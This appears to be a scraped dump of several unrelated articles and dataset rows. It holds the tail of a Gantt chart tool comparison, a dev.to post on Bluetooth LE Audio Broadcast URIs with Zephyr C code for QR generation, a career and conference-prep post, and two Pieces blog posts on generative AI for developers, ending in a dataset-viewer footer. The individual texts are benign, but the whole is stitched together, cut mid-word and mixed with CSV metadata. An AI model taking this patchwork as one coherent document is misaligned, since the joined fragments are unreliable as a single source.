Days of the week are not indicated
## **Planfix**
Another versatile service for large teams and projects with the capability to build Gantt charts. Planfix offers a wide range of features.
**Available Plans for Gantt Chart Creation**
The free plan has limitations on the number of employees (up to five) and projects (up to 10). If you fit within these limits, you can create Gantt charts at no cost. The minimum paid plan starts at €3 per employee.
**Interface Features**
Displays task and subtask names on the chart and sidebar
On the chart: tasks in progress, completed tasks, overdue tasks (in different colors); dependencies between tasks, executor in First Name Last Name format, dates, and days of the week
On the sidebar: start date, end date, and task duration in days; priority (by color)
**Capabilities**
Edit start and end dates on the sidebar and chart
Filter tasks and manually move them on the sidebar
Set dependencies between tasks and assign statuses, but only in advanced editing
Scale task display in hours, days, weeks, and months
Set and manage milestones
Specify exact times for task execution (from and to) or the number of hours
Require result verification before marking a task as complete
Create summary tasks, where the duration of a specific task is automatically calculated based on the durations of its subtasks (a big plus for simplifying life)
**Limitations / Not Yet Available**
Cannot quickly edit task statuses
There's a separate "urgent" task status, but it doesn't display on the panel
The button to create a subtask is hard to find (hint: it's within the advanced task editing)
No clear distinction between tasks and subtasks on the sidebar
No display of task progress stages
## **Wrike**
A popular international planner for flexible project management, including a visually appealing Gantt chart. It is a simple and intuitive system.
**Available Plans for Gantt Chart Creation**
Gantt charts are available starting from the Team plan ($9.80 per user per month)/
**Interface Features**
Task and subtask names on the panel and chart
Task status: on the chart — by colors, on the panel — by label
On the chart: task dependencies, executor by name, dates and days of the week, milestones
On the panel: priority (low, medium, high); start date and due date
**Capabilities**
Create and format tasks on the sidebar
Set task dependencies (predecessor or successor)
Change dates or move the timeline directly on the chart
Scale the project by days, weeks, months, quarters, and years
Specify the number of days required to complete a task
Filter tasks by priority, date, or status on the sidebar, and manually rearrange them
View task change history
Prevent planning on weekends (a plus in my book)
Collapse the sidebar to fully appreciate the Gantt chart visualization
Add and manage milestones
Require result verification before marking a task as complete
Set privacy for guest users
Export and import in xlsx and pdf formats (useful for presentations)
**Limitations / Not Yet Available**
No option to set task start and end times
You can create tasks on the sidebar, but you can only edit dates and efficiency, not the text itself
Task progress is not displayed on the chart
## **ClickUp**
A task and project management platform with automation and real-time collaboration. It includes a mobile app that displays the Gantt chart, perfect for checking project progress even if you wake up in a cold sweat in the middle of the night.
**Available Plans for Gantt Chart Creation**
The free plan includes the Gantt chart feature. It allows up to 60 users in the workspace, but data storage is limited to 100 MB. If you need more storage, it costs $7 per person per month with annual payment.
**Interface Features**
Task and subtask names on the panel and chart
On the chart: deadlines, task dependencies, executor initials, dates with weekend display
On the panel: customizable elements based on user preferences
**Capabilities**
Create, move, and quickly edit tasks on the sidebar
Set task dependencies directly on the chart
Assign task statuses and milestones, but only in advanced editing
Scale task display by days, weeks, months, and years
Set specific task execution times (from and to) or the number of hours
Indicate task priority
Receive email notifications
Extensive sorting options
Snapshot feature for comparing and tracking progress or using in presentations
View the time gap until the next task (with dependency) or until the final task, indicated by markers on the chart
Limitations / Not Yet Available
Task priority is not displayed on the chart or sidebar
Milestones are also not displayed on the chart
Progress stages are visible only for the entire project
## **GanttPRO**
GanttPRO is a resource that allows extensive customization of Gantt charts, offering various settings, colors, statuses, filtering, and display options. It's a popular system supporting export from files in xlsx, csv, mpp formats, and from Jira.
**Available Plans for Gantt Chart Creation**
You can test the program for 14 days for free without any feature restrictions. After that, you need to switch to a paid plan. The simplest plan costs $7.99 per month and includes most features: Gantt chart creation, templates and their auto-filling, task linking, filtering, etc. However, even the minimal plan has some limitations.
**Interface Features**
Task and subtask names on the chart and sidebar
Executor in "First Name Last Name" format on the sidebar and initials on the chart
On the chart: deadlines and progress, task dependencies, milestones
On the sidebar: task status and priority. Parameters are provided by default. Display elements on the sidebar and chart can be flexibly customized.
**Capabilities**
Start and finish of the main task depend on subtasks, and their time frames can be adjusted on the chart
Task positions are automatically corrected when setting dependencies
Contrast highlighting of main tasks and subtasks on the chart
Chart scaling by years, quarters, months, weeks, days, and even hours
Mass formatting and task numbering
Set the lag time for the next task to start after the previous one ends or parallel dependent tasks
Set specific task execution times (from and to) or the number of hours
Choose task color and priority level (from lowest to highest)
Many filters available for task display
Quick parameter editing on the sidebar
Task progress is adjusted on the chart in %
Highlight overdue tasks with one click
Email notifications and export in pdf, png, xlsx, xml formats
The main perk — you can upload an Excel file or Google Sheet with a list of tasks and deadlines, and the service will automatically build a chart based on the document
**Limitations / Not Yet Available**
Days of the week are not displayed on the chart
Sorting is available either manually (dragging tasks) or cascaded — by date
Change history is available not for individual tasks but for the entire project
## **Team Gantt**
Another tool focused specifically on Gantt charts. It is somewhat simpler than the previous one and has a soft, user-friendly interface. It supports export in pdf, xlsx, csv, or png formats. If you intend to use Gantt charts as your primary tool, this is a good choice.
**Available Plans for Gantt Chart Creation**
The free plan allows you to create only one Gantt chart and connect up to three users, including the creator. There are also limitations on task formatting. The standard plan at $19 per month per user removes these limitations. Higher-tier plans offer additional features.
**Interface Features**
Deadlines and progress on the chart and sidebar
Executor in First Name Last Name format on the sidebar and chart
On the chart: task dependencies, milestones, dates, and days of the week
On the sidebar: task and subtask names
**Capabilities**
Hide completed tasks with a single click
Choose task colors and sort by them
Set time frames and dependencies directly on the chart
Adjust task progress on the sidebar and display it on the chart
View change history for specific tasks
Contrast separation of main tasks and subtasks on the chart and sidebar
Quick task parameter editing on the sidebar
Extensive task display filtering options
Time tracking and employee workload table (available only on the paid plan)
Email notifications and export in pdf, xlsx, csv formats
**Limitations / Not Yet Available**
No option to scale the project by months, days, and years
Can only create groups with subtasks; creating individual subtasks is not available
The mobile app does not have a project timeline view
## **Miro**
Miro is an endless interactive digital whiteboard, making it distinct from the other tools listed. It features a minimalist Gantt chart template. Though not the most automated service, it allows for highly detailed customization.
**Available Plans for Gantt Chart Creation**
Free up to three boards, with unlimited Gantt charts on those boards. However, the functionality is significantly limited, with few integrations with external services. The full feature package starts at $16 per month per user with annual payment.
**Interface Features (on the Template)**
Task names in the form of stickers
Start and finish of each task and subtask (beside or below the task itself)
Task dependencies and connections
Milestones with customizable formats
Task status (at the bottom of the sticker)
**Capabilities**
Wide range of color options for tasks, subtasks, arrows, fonts — almost everything
Flexible formats and sizes for various elements
Add and remove columns, rows, stickers, arrows — as per the plan
Set task status (new, in progress, completed)
Start and finish times on the sidebar or within the task card
Add links within the task card
Attach various files on the board — like stickers, photos
Multiple projects, diagrams, and mind maps can be anchored on one board
Import data from other project management systems (extended functionality only on paid plans) In essence, you can customize everything as you wish, but it requires manual effort.
**Limitations / Not Yet Available (and Unlikely to Be Added)**
No automation whatsoever
No time tracking or filtering
Dependencies are unavailable in the free and the cheapest plans
High-resolution board export for presentations only on paid plans
Email notifications only for changes made
No private mode
## **Smartsheet**
Smartsheet is a versatile project management tool that combines the familiarity of spreadsheets with powerful collaboration and project tracking features. It offers a robust Gantt chart functionality, making it a strong choice for managing complex projects.
**Available Plans for Gantt Chart Creation**
Smartsheet offers a 30-day free trial with access to all features. After the trial, the basic plan starts at $14 per month per user, which includes Gantt chart creation, task dependencies, and basic project management features. Higher-tier plans offer additional functionality, such as advanced reporting and resource management.
**Interface Features**
Task and subtask names on the chart and sidebar
Start and end dates of tasks and subtasks
Task dependencies and critical paths
Milestones with customizable markers
Task status and priority on the sidebar
**Capabilities**
Create and format tasks directly on the Gantt chart
Set dependencies between tasks with drag-and-drop functionality
Scale the Gantt chart by days, weeks, months, and quarters
Adjust task duration and timelines directly on the chart
Use conditional formatting to highlight tasks based on status or priority
Track task progress with percentage completion bars
Collaborate with team members in real-time with comments and attachments
Import and export project data in various formats, including xlsx, csv, and pdf
Use built-in templates for quick project setup
Integrate with other tools like Jira, Microsoft Office, and Google Workspace
**Limitations / Not Yet Available**
Advanced resource management features are only available on higher-tier plans
Custom reporting options are limited in the basic plan
No offline mode; requires an internet connection to access and update projects
Limited customization options for task appearance on the free plan
Microsoft Excel
We'll conclude with an offline tool that has existed since ancient times, or at least before the advent of modern services. Back then, all algorithms were manually assembled, and even now, you can find numerous templates for creating Gantt charts in good old Excel.
## **Available Plans for Gantt Chart Creation**
For extensive features for large projects, you can use the paid MS Project. For simpler needs, regular Microsoft Excel is more than sufficient.
**Interface Features**
On the chart: goals and milestones, dates and days of the week
On the sidebar: names of main tasks and subtasks, start date of each task and subtask, number of days to complete, categories (task statuses), progress in %, executor's name
**Capabilities**
Add or remove columns and rows
Track time for tasks by days
Set start time and number of days for completion
Assign task statuses
Import data from other project management systems and export to some services
**Limitations / Not Yet Available and Unlikely to Be Added**
Minimal automation, dependent on the template and settings
Offline version doesn't support multiple users working simultaneously (but you can transfer everything to Google Sheets)
Attaching additional files is not available, but you can insert links
## Summary
When choosing a service, consider your specific needs. Some may prioritize versatility, while others value a variety of tools.
For multifunctional programs with Gantt, Kanban, task lists, and calendars, check out the first four services. They offer both free and paid options for teams of all sizes.
For a Gantt-focused tool with extensive features, go for GanttPRO or TeamGantt.
If you need a highly customizable service, Miro's interactive board is ideal.
If you need an offline tool, standard Microsoft Excel is a great choice.
Click tasks on one or two
| weeek |
1,869,915 | Broadcast Audio URI | Audio sharing is caring Until recently, most generic Bluetooth enabled speakers and... | 0 | 2024-06-06T20:56:37 | https://dev.to/denladeside/broadcast-audio-uri-1kkd | leaudio, web, bluetooth, zephyr | ---
title: Broadcast Audio URI
published: true
description:
tags: LEAudio, Web, Bluetooth, Zephyr
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/hjp0zzgrwwfyrrdmc2ey.png
# published_at: 2024-06-06 22:30 +0000
---
# Audio sharing is caring
Until recently, most generic Bluetooth enabled speakers and headsets have been using Bluetooth Classic. With the introduction of [Bluetooth LE Audio](https://www.bluetooth.com/learn-about-bluetooth/feature-enhancements/le-audio/), a wide new range of solutions become possible and one of the most exciting ones is the possibility to broadcast audio, where the sender and receiver are no longer required to be connected (like the 1-1 Bluetooth Classic case - e.g a phone and a headset).
> _"LE Audio introduces broadcast audio to Bluetooth® technology, a new feature that enables an audio transmitter to broadcast to an unlimited number of nearby Bluetooth audio receivers. Broadcast audio opens significant new opportunities for innovation, including a powerful new capability, Auracast™ broadcast audio._
>
> _Auracast™ broadcast audio is a set of defined configurations of Bluetooth® broadcast audio which are specified within the Public Broadcast Profile (PBP) specification that enables new, globally interoperable audio experiences for consumers."_
Read more about Auracast here: https://www.bluetooth.com/auracast/developers/
# Sharing Links to Broadcasts
Even though it is possible to scan for nearby broadcasts using a [Broadcast Audio Assistant](https://www.bluetooth.com/auracast/how-it-works/), sometimes, it will be more practical for users to 'tune in' to Broadcast sources using a trusted link provided through other means.
The [Broadcast Audio URI](https://www.bluetooth.com/specifications/specs/broadcast-audio-uri-2/) is an exciting new spec that allows just that: Information about a Broadcast Audio Source to be conveyed over an out-of-band (OOB) medium to a Broadcast Audio Assistant - or, if the Broadcast Sink supports it, directly by e.g. touching an NFC tag, containing the Broadcast Audio URI, with a speaker or earbuds.
An example from the spec:

This includes all the information for a Broadcast Sink to find the right broadcast. The data in the QR code is this text:
```
BLUETOOTH:UUID:184F;BN:SG9ja2V5;SQ:1;AT:0;AD:AABBCC001122;AS:1;BI:DE51E9;PI:F
FFF;NS:1;BS:1;;
```
Which roughly translates to:
"Related to the 0x184F UUID (Broadcast Audio Scan Service), there is a Standard Quality mono channel broadcast at addresss AA:BB:CC:00:11:22 with Broadcast ID 0x0E51E9 and the Broadcast name 'Hockey'"
# Zephyr for the win!
The [Zephyr RTOS](https://www.zephyrproject.org/) is a very powerful OS for embedded devices and it also includes support for [LE Audio](https://docs.zephyrproject.org/latest/connectivity/bluetooth/api/audio/bluetooth-le-audio-arch.html). If this is the first time you hear about it, please check some of my other posts on getting started with Zephyr, e.g. [Getting started with Zephyr and Web Bluetooth](https://dev.to/denladeside/getting-started-with-zephyr-and-web-bluetooth-355d)
In the Zephyr repo, there is a [Broadcast Audio Source sample](https://github.com/zephyrproject-rtos/zephyr/tree/main/samples/bluetooth/bap_broadcast_source) that was used as a starting point.
There is also great support for different displays, which we will need to display the Broadcast Audio URI in a QR code.
To my happy surprise, there was already [QR code support](https://docs.lvgl.io/master/libs/qrcode.html) in the [LVGL](https://lvgl.io/) module included in Zephyr so I implemented some minimal QR-Code functionality to expose the required data once the Broadcast source was ready on the device. As this is a PoC, the non-changing parameters are hardcoded:
```c
void gui_update_qr_code(const bt_addr_t *addr, uint32_t broadcast_id, uint8_t *name)
{
uint8_t addr_str[13];
uint8_t name_base64[128];
size_t name_base64_len;
/* Address */
snprintk(addr_str, sizeof(addr_str), "%02X%02X%02X%02X%02X%02X",
addr->val[5], addr->val[4], addr->val[3],
addr->val[2], addr->val[1], addr->val[0]);
/* Name */
base64_encode(name_base64, sizeof(name_base64), &name_base64_len, name, strlen(name));
name_base64[name_base64_len + 1] = 0;
/* Most fields hard coded for this demo */
snprintk(qr_data, sizeof(qr_data),
"BLUETOOTH:UUID:184F;BN:%s;SQ:1;AT:1;AD:%s;AS:0;BI:%06X;PI:FFFF;NS:1;BS:1;;",
name_base64, addr_str, broadcast_id);
lv_qrcode_update(qr_code, qr_data, strlen(qr_data));
lv_task_handler();
}
```
The result is here:

# Try it out!
Put together, here is a PoC of how a [Broadcast Audio URI](https://www.bluetooth.com/specifications/specs/broadcast-audio-uri-2/) can be used to expose a dynamically generated QR code on an nRF5340 Audio DK with a screen attached.
> Hardware used:
> * [nRF5340 Audio DK](https://www.nordicsemi.com/Products/Development-hardware/nRF5340-Audio-DK)
> * [Adafruit 2.8" TFT Touch Shield](https://www.adafruit.com/product/1947)
>
The code is available here: https://github.com/larsgk/bau-source
Connecting the board to the USB port of any host device supporting USB Audio (Windows, Linux, Mac, Android, ChromeOS, etc), will automatically make the connected board a Broadcast Audio Source, streaming whatever is played on the host device. If you have access to one of the latest Samsung mobile phones and Galaxy Buds2 Pro, you should be able to find and select the broadcast and hear it in the earbuds.
# See it in action
Currently, there are no implementations of the full Broadcast Audio URI flow in any device available on the market, so I have been using a dedicated web based stand-alone broadcast assistant application, modified to read and parse the Broadcast Audio URI QR code (this will be covered in a future post). It's using the [BarcodeDetector API](https://developer.mozilla.org/en-US/docs/Web/API/BarcodeDetector) on supported devices to read the QR code.
It allows a user to scan a Broadcast Audio URI QR code and add it directly to an attached Broadcast Sink (e.g earbuds able to receive broadcasts, like the Samsung Galaxy Buds2 Pro).
The result is here:
{% youtube NZ0PG1rOZYQ %}
Credits to [Nick Hunn](https://www.nickhunn.com/), [Hai Shalom](https://www.linkedin.com/in/haishalom/) and others on doing great work on the [Broadcast Audio URI ](https://www.bluetooth.com/specifications/specs/broadcast-audio-uri-2/)
| denladeside |
1,879,645 | The Art of Being Bored: The Upside to Downtime | own to the ATL to be one of the official MC’s/hosts of Render 2024. If you plan on being there please... | 0 | 2024-06-06T20:32:00 | https://dev.to/tdesseyn/the-art-of-being-bored-the-upside-to-downtime-4ggo | careerdevelopment, career | own to the ATL to be one of the official MC’s/hosts of Render 2024. If you plan on being there please come find me!! I have no idea what stage I’m going to be on but just listen for my loud voice :) But for real, let’s get into some conference prep for Render before we dive into a recent live show I did…
- Do your research on what sessions to go to; Render has a mobile app so pick what events you want to attend on the front end! Trust me, I’ve rolled into conferences not prepping and I panic.
- Figure out your elevator pitch; you are going to meet a TON of people for about 30 seconds at a time so you need to be able to tell that person EXACTLY what you do and what you want to do quickly.
- Get as many people into your LinkedIn ecosystem as you can and then follow up after the conference; most people don’t follow up and you lose a TON of momentum.
I hope you have a blast at Render if you go! If you aren’t going to Render, then I hope you enjoyed that conference prep for the next conference you attend! Anywho, let’s get to the meat and potatoes of the newsletter….
I recently had [Reid Evans on to talk](https://www.youtube.com/live/ApsTmK8izOY) about something I think we’re all feeling— getting tired of “the grind.” Whether you’ve lost career momentum, said yes to too many things/people, or are just tired of the corporate life (more about that later), let’s take a sec to stop and think about what we’re actively doing to make that situation better.
You know that whole 'never-ending, pedal to the metal' vibe in our industry? It's coming from all directions. We're stuck in this work culture where jobs disappear, but the workload just keeps piling up on everyone else. Or let's be real, some of us have kind of become low-key addicted to the hustle. Looking at myself here. But that gets me to my point, and a big topic that Reid and I talked about, we’ve really forgotten how to be bored.
Being constantly busy does a couple things we probably don’t think about. It forces us into a schedule AND it also distracts us thinking about life’s what-ifs. Hear me out, would the grind be so bad if you were actually working on something you were passionate about? And when’s the last time you took the time to slow down, be bored, and think about what that passion actually is?
Obviously this conversation comes from a place of privilege of not being restricted by money or other circumstances. But I think we owe it to ourselves to take some time now and again to be bored. And tbh it’s uncomfortable. From experience. But the clarity and the conversations you have with yourself and others after is worth it. I’m going work on more intentional boredom and y’all let me know if it works for you.
To those of you that are tired of corporate America and on the verge of rage quitting, this part is for you. So many people are over the whole 'circling back' 9-5 routine... Talking about making the move to freelance, Reid said something along the lines of he was tired of working so hard to make money for other people and tired of those people spending that money on him for things he doesn’t need or want. Which is the problem with corporate life in a nutshell. What he did do, though, is have a loose plan and more importantly some savings. So if you’re thinking that you don’t need no “man” to make money, you’re probably right but rage quitting is very rarely successful. What should we call quitting with a plan, premeditated quitting? Do that.
Alright, I hope I’ll see some of y’all at Render and we can talk about this more. I want to hear what you’re thinking. | tdesseyn |
1,879,642 | GenAI is Shaping the Future of Software Development | In the second part of the conversation on the Emerj podcast, Tsavo Knott joins Daniel Faggella to discuss the rapid progression of generative AI capabilities. | 0 | 2024-06-06T20:25:13 | https://code.pieces.app/blog/genai-is-shaping-the-future-of-software-development | <figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/gen-ai-part2_bd5b16a3770867b50765007ead50718e.jpg" alt="GenAI is Shaping the Future of Software Development."/></figure>
In the second part of the conversation on the Emerj podcast, Tsavo Knott, CEO of Pieces, joins Daniel Faggella, Emerj CEO and Head of Research, to discuss the rapid progression of generative AI (GenAI) capabilities and their profound impact on developer markets and the future of software development. This discussion highlights both the limitations and the boundless potential of GenAI tools, offering valuable insights for business leaders and developers alike.
Tsavo also shares how [systems that augment human work](https://code.pieces.app/blog/how-ai-automation-benefits-world-class-developers) are transforming the roles of individual workers, making them less about performing specific tasks and more about becoming cross-functional assets within their organizations. He highlights how Pieces is at the forefront of this transformation, providing tools that help developers navigate and thrive in this evolving landscape.
## The Evolution of Software Development
Tsavo begins by expressing his excitement about the evolution of machine learning and its implications for the products that Pieces is building. He emphasizes how the company aims to augment developer work streams, enhancing productivity and enabling the creation of unique experiences at a faster pace. All of this is driven by an increased demand for GenAI software solutions in various industries, a shortage of skilled developers, and the ever-rising complexity of software projects.
A key concept discussed is the "[context window](https://code.pieces.app/blog/ai-context-making-the-most-out-of-your-llm-context-length)," which refers to the amount of background knowledge a model has at processing time. Tsavo explains that traditionally, context windows were very small, containing about 2,000 tokens, which is equivalent to a handful of files. In contrast, modern models like GPT-4 can handle around 32,000 tokens or roughly 300 pages of text. He summarizes that "in theory, more context is better."
## Limitations of the Current GenAI Tooling
Discussing the constraints of the current machine learning and generative AI tools, Tsavo highlights the dual role of [GenAI](https://code.pieces.app/blog/conversational-ai-vs-generative-ai-benefits) as both a search and authorship mechanism. He provides examples of authorship, including writing new code, authoring marketing content, and generating financial projections. While GenAI systems enable faster creation of digital assets, Tsavo warns that the quality of the output can be average due to inherent biases in the underlying data.
He cautions that while GenAI tools can produce millions of lines of code quickly, the quality might not be high. He underscores the importance of improving models in areas such as context windows, tokens per second, and output to keep up with future demands.
## Growing Use Cases and the Potential of GenAI
Despite the challenges with Gen AI, Tsavo anticipates massive growth in server farms dedicated to powering AI systems and foresees significant advancements in on-device models and supporting consumer hardware. Tsavo identifies several fundamentals that will limit the ability to ship products with desired features and functionality, including supply, GPU, compute, and energy.
However, he believes that humans will continue to find creative ways to apply these models across various industries. He points out that there is an abundance of untapped data, including hundreds of years of information from Fortune 100 companies. Tsavo emphasizes that we are only scratching the surface of the power requirements needed to leverage this data.
## Shift in the Role of Developers
Tsavo also anticipates a [shift](https://code.pieces.app/blog/dont-just-shift-left-shift-down-to-empower-your-devops-team) in the role of individual workers, with developers becoming more cross-functional across their organizations. He believes that this cross-functional behavior will naturally change the structure of organizations, flattening layers and making them more efficient. This, in turn, will enable the US to upskill its development workforce to the highest level, or "10x," helping it keep up with countries that have larger workforces.
## Final Thoughts
The second part of the Emerj podcast with Tsavo Knott provided a comprehensive overview of the challenges and opportunities presented by generative IA in software development. As the industry continues to evolve, the insights shared underscore the importance of adaptability, the potential for GenAI to augment human creativity, and the strategic considerations for leveraging these advancements. At Pieces, we are committed to providing the tools and technologies that empower developers to navigate this changing landscape successfully.
Want to dive deeper into these topics? [Tune into the full podcast episode](https://emerj.com/ai-podcast-interviews/market-and-tech-forces-shaping-future-of-software-development-tsavo-knott-pieces/) for more expert insights from Tsavo Knott on the rise of the [exciting phase of generative AI startups](https://code.pieces.app/blog/future-of-generative-ai-startups-pieces-copilot-ama-recap-highlights) and other GenAI tools. | get_pieces | |
1,879,628 | How AI Automation Benefits World-Class Developers | Tsavo Knott, Co-founder and CEO of Pieces, recently shared his insights on AI in software development during an engaging conversation on the Emerj podcast. | 0 | 2024-06-06T20:18:47 | https://code.pieces.app/blog/how-ai-automation-benefits-world-class-developers | <figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/gen-ai-part1_62188ba6d44b25eec0de388bc37af1f0.jpg" alt="How AI Automation Benefits World-Class Developers."/></figure>
The role of software developers is undergoing a significant transformation in today's rapidly evolving technological landscape driven by radical advancements in AI and automation. The advent of AI automation tools and technologies is at the forefront of this change, enabling developers to work more efficiently and effectively. These advancements are not just about replacing human effort but enhancing it, allowing developers to focus on more complex and creative aspects of their work.
Tsavo Knott, Co-founder and CEO of Pieces, recently shared his insights on this topic during an engaging conversation on the Emerj podcast. In this discussion, Tsavo digs into the nuances of modern development tools, categorizing companies based on their approach and highlighting how Pieces is navigating these advancements. Here, we explore the key points discussed and examine the evolving role of developers in this new era.
## Understanding the Two Approaches to Automation
Tsavo begins by categorizing companies into two distinct groups based on their approach to intelligent automation:
**1. Full Automation and Replacement**: Some companies are exploring the possibility of fully automating and replacing the roles of certain developers. These organizations are evaluating whether autonomous agents can completely take over the tasks traditionally performed by developers.
**2. Augmentation and Enhancement**: Pieces falls into the second category, which acknowledges that while the role of developers is changing, it is not becoming obsolete. Instead, developers are becoming more cross-functional and are being profoundly augmented with advanced A.I automation tools. Tsavo emphasizes that developers are now working on more tasks and doing so at a faster pace.
## The Changing Role of Developers
Tsavo reflects on how his role as a developer has evolved over the past few years. Previously, he focused exclusively on writing code in a few languages. However, with the advent of AI systems, he now writes code for every team in his company. This shift has allowed him to move faster across the entire organization, spending less time intensely focused on one particular area or language.
## Complexities Faced by AI Systems
While AI systems have made significant strides, they still face considerable challenges, especially when it comes to understanding and refactoring poorly written code, often known as "spaghetti code." For AI automation to effectively manage such tasks, it would need an extensive contextual understanding of the code base, an understanding of the original structure and logic of the codebase, and the ability to handle a vast array of parameters to accurately interpret and modify the code.
The benefit of 10x engineers, according to Tsavo, is that they inherently possess this information and keep stakeholders in mind before they build. Tsavo concludes with advice on how developers can use intelligent automation tools to complement their work. He suggests that developers should evaluate whether they are spending most of their time figuring out how to solve a problem and, if so, consider using [generative AI](https://code.pieces.app/blog/genai-is-shaping-the-future-of-software-development) to expedite the process. Learning to identify when it is ideal to use these tools is crucial for enhancing productivity.
## Pieces' Approach to AI Automation and Augmentation
At Pieces, the focus is on [creating tools](https://docs.pieces.app/features/pieces-copilot) that [augment the capabilities of developers](https://code.pieces.app/blog/workflow-integration-with-ai-a-unified-approach-to-development) rather than replacing them. This approach is rooted in the belief that developers are becoming more cross-functional and need advanced tools to keep up with the increasing demands of their roles. By providing these tools, Pieces aims to help developers work more efficiently and effectively.
## Final Thoughts
This episode of the Emerj podcast with Tsavo Knott provided a comprehensive overview of the challenges and opportunities presented by artificial intelligence automation in software development. As the industry continues to evolve, the insights shared underscore the importance of adaptability, and the potential for AI to augment human creativity, as well as strategic considerations.
With tools like Pieces for Developers, there's a pathway to navigate these changes, ensuring that the future of software development is as exciting as it is challenging. At Pieces, we are committed to providing the tools and technologies that empower developers to navigate this changing AI automation landscape successfully.
Want to dive deeper into these topics? [Tune into the full podcast episode](https://emerj.com/ai-podcast-interviews/automation-and-augmentation-in-development-tools-tsavo-knott-pieces/) for more expert insights from Tsavo Knott on the rise of the exciting phase of AI-powered automation, the role of developers in an AI-augmented future, and how to become an AI-powered enterprise. | get_pieces |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.